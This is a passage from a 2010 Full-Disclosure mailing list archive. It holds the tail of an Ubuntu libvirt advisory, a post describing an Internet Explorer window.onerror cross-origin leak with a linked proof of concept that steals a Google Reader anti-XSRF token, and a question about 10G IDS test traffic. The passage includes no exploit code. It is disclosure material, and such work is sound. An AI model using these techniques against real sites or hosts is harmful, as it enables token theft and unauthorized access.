 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile
 which provided partial protection against this flaw. (CVE-2010-2239)
 
 Jeremy Nickurak discovered that libvirt created iptables rules with too
 lenient mappings of source ports. A privileged attacker in the guest could
 bypass intended restrictions to access privileged resources on the host.
 (CVE-2010-2242)


Updated packages for Ubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1.diff.gz
  Size/MD5:11109 9e7424ceeab64e557fb589496aac69e9

http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1.dsc
  Size/MD5: 2155 58fffa8f010cd5d3c8b3a709da9e1311

http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1.orig.tar.gz
  Size/MD5:   428911 f87ccfe2b77823c9e06d32e8b6f20424

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/python-virtinst_0.500.1-2ubuntu6.1_all.deb
  Size/MD5: 1564 402d23ff10bc82ffaec3554c883399ea

http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1_all.deb
  Size/MD5:   230728 a958ec144ad1a7bdb3e4e1c25173fcdf






signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Internet Explorer 8 PoC: window.onerror leak leads to surge in interest in goat farming?

2010-10-21 Thread Chris Evans
Hi,

Internet Explorer has a cross-origin leak through the window.onerror
callback.
At first glance, it's a minor leak but if you look around you can find a
significant impact on some subset of websites.

I wrote up more thorough details on how the attack works here:
http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html

I also provided a PoC against Google Reader; the victim has their anti-XSRF
token stolen and this is used to force them to subscribe to a feed on goat
farming: http://scary.beasts.org/misc/reader.html

(Unfortunately -- or fortunately depending upon you point of view -- the PoC
is neutered because the Reader team elected to work around the IE
vulnerability for now).

The vulnerability remains unfixed in production versions of IE and is
approaching 2 years old since vendor notification. This would make this a
600-day disclosure. It would be inaccurate to use the term 0-day, although
misuse of that term is somewhat rampant.

Security-conscious users may wish to prefer the Firefox browser over
Internet Explorer; the timeline in the blog post shows two very different
vendor responses to the exact same cross-origin leak.


Cheers
Chris
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] 10G virtual network traffic

2010-10-21 Thread 김무성
Hello list.

 

I’m making a virtual network which has 10G traffic for testing 10G IDS
performance.

I use a Breaking point device. http://www.breakingpointsystems.com/cyber-
tomography-products/

Are there any tips or document about making 10G virtual network?

And what point is important?

How can I analysis without knowing real network traffic?

 

What is the different things? 1G network traffic VS 10G network traffic



smime.p7s
Description: S/MIME cryptographic signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/